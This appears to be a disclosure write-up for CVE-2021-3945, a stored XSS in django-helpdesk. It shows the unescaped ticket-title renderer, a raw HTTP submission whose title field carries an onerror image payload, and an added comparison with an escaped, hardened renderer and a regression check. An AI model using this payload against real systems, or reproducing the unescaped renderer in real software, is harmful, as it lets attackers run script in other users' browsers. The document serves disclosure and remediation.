CVE-2021-3945 Django-helpdesk stored XSS

{
    data: "ticket",
    render: function (data, type, row, meta) {
        if (type === 'display') {
            // row.title is concatenated into the markup without HTML encoding
            data = '<div class="tickettitle"><a href="' + get_url(row) + '" >' + '. ' + row.title + '</a></div>';
        }
        return data;
    }
}

POST /tickets/submit/ HTTP/1.1
Cookie: csrftoken=5xfltA7UxP3sMJG5OHKCAlHRzR9mrrUbXWfwOrJJl6JhC3OszzsZBcFMEmbCsIeh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------35329910622610784793670383726
Content-Length: 1150
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Content-Disposition: form-data; name="csrfmiddlewaretoken"

Content-Disposition: form-data; name="queue"

Content-Disposition: form-data; name="title"

"><iMg SrC="x" oNeRRor="alert(1);">
Content-Disposition: form-data; name="body"

Content-Disposition: form-data; name="priority"

Content-Disposition: form-data; name="due_date"

Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream

Content-Disposition: form-data; name="submitter_email"
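
The column renderer above places row.title into the cell markup without encoding, so the title value submitted in this request is parsed as HTML when the ticket list is displayed. The block below is an added example, not code from the original post and not django-helpdesk's actual patch: it puts that renderer beside a hardened version. get_url, escapeHtml, hasInjectedTag and sampleRow are assumptions constructed for illustration.

```javascript
// Added example, not django-helpdesk's code or fix. get_url() here is a
// stand-in (assumption) for the helper that the page's snippet calls.
function get_url(row) {
  return '/tickets/' + encodeURIComponent(row.id) + '/';
}

// Encode the characters that can change the HTML parsing context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Renderer as shown on the page: row.title is concatenated raw.
const vulnerableColumn = {
  data: 'ticket',
  render: function (data, type, row, meta) {
    if (type === 'display') {
      data = '<div class="tickettitle"><a href="' + get_url(row) + '" >' +
        '. ' + row.title + '</a></div>';
    }
    return data;
  }
};

// Hardened form: same markup, but the URL and title are encoded before insertion.
const hardenedColumn = {
  data: 'ticket',
  render: function (data, type, row, meta) {
    if (type === 'display') {
      data = '<div class="tickettitle"><a href="' + escapeHtml(get_url(row)) + '" >' +
        '. ' + escapeHtml(row.title) + '</a></div>';
    }
    return data;
  }
};

// Constructed row carrying the title value from the request on this page.
const sampleRow = { id: 1, title: '"><iMg SrC="x" oNeRRor="alert(1);">' };

// True if the cell contains any start tag other than the expected div/a wrapper.
function hasInjectedTag(html) {
  const tags = html.match(/<\s*[a-zA-Z][^>]*>/g) || [];
  return tags.some((t) => !/^<(div|a)\b/i.test(t));
}

const vulnerableHtml = vulnerableColumn.render('t', 'display', sampleRow, {});
const hardenedHtml = hardenedColumn.render('t', 'display', sampleRow, {});
```

hasInjectedTag can double as a regression check in a unit test for any renderer that builds cell HTML from ticket fields.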



